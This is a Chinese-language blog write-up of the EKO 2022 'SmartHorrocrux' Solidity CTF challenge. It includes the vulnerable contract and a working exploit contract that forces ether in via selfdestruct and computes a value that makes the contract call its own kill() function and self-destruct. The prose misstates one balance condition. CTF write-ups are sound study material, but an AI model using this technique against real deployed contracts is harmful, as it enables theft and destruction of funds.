EKO

CTF-EKO-SmartHorrocrux

Posted by Thomas_Xu on 2023-02-28

CTF-EKO-SmartHorrocrux

author:Thomas_Xu

先来看题目简介和代码

一些安全研究人员最近发现了第八个魂器,似乎伏地魔与智能合约有联系,你能摧毁它吗?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

/// @title SmartHorrocrux
/// @author https://twitter.com/AugustitoQ
/// @notice Some security researchers have recently found an eighth Horrocrux, it seems that Voldemort has link to a smart contract, can you destroy it?
/// @custom:url https://www.ctfprotocol.com/tracks/eko2022/smart-horrocrux
contract SmartHorrocrux {
    bool private invincible;
    bytes32 private constant _spell = 0x45746865724b6164616272610000000000000000000000000000000000000000;
    // var only for test purposes
    bool public alive = true;

    constructor() payable {
        require(msg.value == 2, "Pay Horrorcrux creation price");
        setInvincible();
    }

    function destroyIt(string memory spell, uint256 magic) public {
        bytes32 spellInBytes;
        assembly {
            spellInBytes := mload(add(spell, 32))
        }
        require(spellInBytes == _spell, "That spell wouldn't kill a fly");
        require(!invincible, "The Horrocrux is still invincible");

        bytes memory kedavra = abi.encodePacked(bytes4(bytes32(uint256(spellInBytes) - magic)));
        address(this).call(kedavra);
    }

    function kill() external {
        require(msg.sender == address(this), "No one can kill me");
        alive = false;
        selfdestruct(payable(tx.origin));
    }

    function setInvincible() public {
        invincible = (address(this).balance == 1) ? false : true;
    }

    fallback() external {
        uint256 b = address(this).balance;
        invincible = true;
        if (b > 0) {
            tx.origin.call{value: b}("");
        }
    }
}

读完SmartHorrocrux思路好像就挺清晰,大概是通过调用destroyIt去调用kill让合约自毁,只是有一些判断需要通过。让我们看看Factory是不是这样要求的吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function deploy(address) external payable override returns (address[] memory ret) {
    require(msg.value == 2, "Pay me 2 wei");
    address _challenge = address(new SmartHorrocrux{value: 2}());
    ret = new address[](1);
    ret[0] = _challenge;
}

function isComplete(address[] calldata _challenges) external view override returns (bool) {
    // @dev to win this challenge you must detroy the contract
    address _contract = _challenges[0];

    uint256 size;
    assembly {
        size := extcodesize(_contract)
    }
    return size == 0;
}

果然哈,就是要让合约自毁,那我们就来看看有哪些判断要通过呗。

1
2
3
4
5
6
7
8
9
10
11
function destroyIt(string memory spell, uint256 magic) public {
    bytes32 spellInBytes;
    assembly {
        spellInBytes := mload(add(spell, 32))
    }
    require(spellInBytes == _spell, "That spell wouldn't kill a fly");
    require(!invincible, "The Horrocrux is still invincible");

    bytes memory kedavra = abi.encodePacked(bytes4(bytes32(uint256(spellInBytes) - magic)));
    address(this).call(kedavra);
}

这里的前三行其实就是把string转换成了bytes32,不用过多纠结。

第一个require就是要我们传入的spell和它的_spell相等,那我们构造一下就行:

1
2
bytes32 spellInBytes = bytes32(0x45746865724b6164616272610000000000000000000000000000000000000000);
string memory spell = string(abi.encodePacked(spellInBytes));

第二个require要invincible为false,魂器要被销毁才是重点,我们可以看到setInvincible是可以修改的

1
2
3
function setInvincible() public {
        invincible = (address(this).balance == 1) ? false : true;
}

要求当前合约的余额为0,但初始化为2,并且falback函数如下:

1
2
3
4
5
6
7
fallback() external {
    uint256 b = address(this).balance;
    invincible = true;
    if (b > 0) {
    tx.origin.call{value: b}("");
    }
}

那我们可以通过调用一个fallback,使合约余额为0,最后创建一个有1wei的新合约自毁来达到给这个合约硬塞ETH的目的。

最后的最后构造一下destroyIt的调用data即可。

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

import "./SmartHorrocrux.sol";

contract SmartHorrocruxAttack {
    SmartHorrocrux public sh;
    constructor(address addr) {
        sh = SmartHorrocrux(addr);
    }

    function attack() public {
        sh.setInvincible();
        bytes32 spellInBytes = bytes32(0x45746865724b6164616272610000000000000000000000000000000000000000);

        string memory spell = string(abi.encodePacked(spellInBytes));
        bytes32 selector = bytes32(abi.encodeWithSignature("kill()"));
        uint256 magic = uint256(spellInBytes) - uint256(selector);
        
        sh.destroyIt(spell, magic);
    }
}

contract destruct{
    constructor(address payable _target) public payable {
        _target.call("");
        selfdestruct(_target);
    }
}
notice

true

This is copyright.

...

...

00:00
00:00
FEATURED TAGS
EKO